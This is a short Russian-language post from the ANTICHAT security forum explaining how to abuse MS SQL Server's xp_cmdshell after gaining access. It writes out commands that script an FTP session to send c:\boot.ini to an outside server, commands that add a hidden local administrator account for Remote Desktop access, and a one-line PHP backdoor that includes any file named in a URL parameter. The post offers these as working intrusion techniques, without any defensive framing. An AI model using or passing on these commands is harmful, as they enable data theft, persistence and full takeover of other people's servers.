ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Да можно с помощью xp_cmdshell + ftp.

Вообще если 3389 открыт то народ обычно админа делает себе и заходит через remote desctop.

Как файлы заливать:
exec master.dbo.xp_cmdshell 'echo open ftp.server.net > c:\ftp.ini'
exec master.dbo.xp_cmdshell 'echo 123 ftp >> c:\ftp.ini'
exec master.dbo.xp_cmdshell 'echo 123 ftp >> c:\ftp.ini'
exec master.dbo.xp_cmdshell 'echo put c:\boot.ini >> c:\ftp.ini'
exec master.dbo.xp_cmdshell 'echo bye >> c:\ftp.ini'

exec master.dbo.xp_cmdshell ' ftp -i -s:c:\ftp.ini'

Админа создавать:
exec master.dbo.xp_cmdshell 'net user test test12345 /add'
exec master.dbo.xp_cmdshell 'net localgroup administrators test /add'

Если путь к сайту знаешь то через echo можешь создать файлик типа <?php include($_GET['i']); ?>

Вообщем способов много.